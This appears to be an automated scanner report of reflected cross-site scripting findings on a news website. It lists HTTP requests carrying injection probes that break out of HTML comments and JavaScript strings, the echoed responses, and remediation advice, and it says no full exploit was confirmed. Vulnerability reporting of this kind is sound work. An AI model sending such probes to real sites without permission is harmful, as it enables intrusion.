GET /related/topics/index.html?subject=Sasha+Khan85ce5-->cda0818e7d9&type=Person HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 69308 Expires: Sun, 19 Dec 2010 03:16:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:16:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <!-- Source="/scripts/sp6query.aspx?catalog=ntnp&type=stry&tags=Person|Sasha Khan85ce5-->cda0818e7d9" --> ...[SNIP]...
The value of the type request parameter is copied into an HTML comment. The payload f93a8-->68984d528c3 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /related/topics/index.html?subject=Sasha+Khan&type=Personf93a8-->68984d528c3 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 69286 Expires: Sun, 19 Dec 2010 03:16:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:16:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <!-- Source="/scripts/sp6query.aspx?catalog=ntnp&type=stry&tags=Personf93a8-->68984d528c3|Sasha Khan" --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65f4e'%3b3aea91e1e6a was submitted in the REST URL parameter 1. This input was echoed as 65f4e';3aea91e1e6a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /scripts65f4e'%3b3aea91e1e6a/include.aspx HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43139
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c19b1'%3ba1b3409a31b was submitted in the REST URL parameter 2. This input was echoed as c19b1';a1b3409a31b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /scripts/c19b1'%3ba1b3409a31b HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43156
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96971'%3bec011e91bf5 was submitted in the REST URL parameter 1. This input was echoed as 96971';ec011e91bf5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap96971'%3bec011e91bf5/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:16:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:16:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36302
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46038'%3bae96b99ff54 was submitted in the REST URL parameter 1. This input was echoed as 46038';ae96b99ff54 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business46038'%3bae96b99ff54/best-cities/joint-venture/Closing+between+research+experience/2102841/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 84802 Expires: Sun, 19 Dec 2010 03:08:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:08:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business46038';ae96b99ff54/best-cities/joint-venture/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business46038';ae96b99ff54;kw=best-cities;kw=joint-venture;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c912'%3bd5511528c72 was submitted in the REST URL parameter 2. This input was echoed as 6c912';d5511528c72 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities6c912'%3bd5511528c72/joint-venture/Closing+between+research+experience/2102841/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 77948 Expires: Sun, 19 Dec 2010 03:08:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:08:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities6c912';d5511528c72/joint-venture/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities6c912';d5511528c72;kw=joint-venture;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTa ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72070'%3bcec5620d8c8 was submitted in the REST URL parameter 3. This input was echoed as 72070';cec5620d8c8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture72070'%3bcec5620d8c8/Closing+between+research+experience/2102841/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 77912 Expires: Sun, 19 Dec 2010 03:09:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities/joint-venture72070';cec5620d8c8/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities;kw=joint-venture72070';cec5620d8c8;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=1038324 ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56cc3'%3b99117c719dc was submitted in the REST URL parameter 5. This input was echoed as 56cc3';99117c719dc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture/Closing+between+research+experience/210284156cc3'%3b99117c719dc/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71299
Expires: Sun, 19 Dec 2010 03:09:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:13 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities/joint-venture/closing-between-research-experience/210284156cc3';99117c719dc/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities;kw=joint-venture;kw=closing-between-research-experience;kw=210284156cc3';99117c719dc;kw=npo;kw=fpo;tile='+da ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65b99'%3bbbd8176cea9 was submitted in the REST URL parameter 6. This input was echoed as 65b99';bbd8176cea9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture/Closing+between+research+experience/2102841/65b99'%3bbbd8176cea9 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44894
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ef15'%3bce2d27e0d39 was submitted in the REST URL parameter 1. This input was echoed as 9ef15';ce2d27e0d39 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business9ef15'%3bce2d27e0d39/best-cities/joint-venture/Partnerships+bright+spot+Britec/2055099/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 84026
Expires: Sun, 19 Dec 2010 03:08:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:56 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business9ef15';ce2d27e0d39/best-cities/joint-venture/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business9ef15';ce2d27e0d39;kw=best-cities;kw=joint-venture;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d1a4'%3bfac81be792e was submitted in the REST URL parameter 2. This input was echoed as 4d1a4';fac81be792e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities4d1a4'%3bfac81be792e/joint-venture/Partnerships+bright+spot+Britec/2055099/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77173
Expires: Sun, 19 Dec 2010 03:09:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:04 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities4d1a4';fac81be792e/joint-venture/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities4d1a4';fac81be792e;kw=joint-venture;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTa ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c901d'%3bd0c504950d5 was submitted in the REST URL parameter 3. This input was echoed as c901d';d0c504950d5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venturec901d'%3bd0c504950d5/Partnerships+bright+spot+Britec/2055099/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83954
Expires: Sun, 19 Dec 2010 03:09:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:11 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities/joint-venturec901d';d0c504950d5/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities;kw=joint-venturec901d';d0c504950d5;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=2589576 ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0cf7'%3b3f1d5d5c2b was submitted in the REST URL parameter 5. This input was echoed as a0cf7';3f1d5d5c2b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture/Partnerships+bright+spot+Britec/2055099a0cf7'%3b3f1d5d5c2b/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64307
Expires: Sun, 19 Dec 2010 03:09:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:20 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities/joint-venture/partnerships-bright-spot-britec/2055099a0cf7';3f1d5d5c2b/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities;kw=joint-venture;kw=partnerships-bright-spot-britec;kw=2055099a0cf7';3f1d5d5c2b;kw=npo;kw=fpo;tile='+dartad_ ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85e05'%3b4b9648ce5b0 was submitted in the REST URL parameter 6. This input was echoed as 85e05';4b9648ce5b0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture/Partnerships+bright+spot+Britec/2055099/85e05'%3b4b9648ce5b0 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44818
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c028'%3b6a3c0b19ed8 was submitted in the REST URL parameter 1. This input was echoed as 6c028';6a3c0b19ed8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business6c028'%3b6a3c0b19ed8/best-cities/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83960
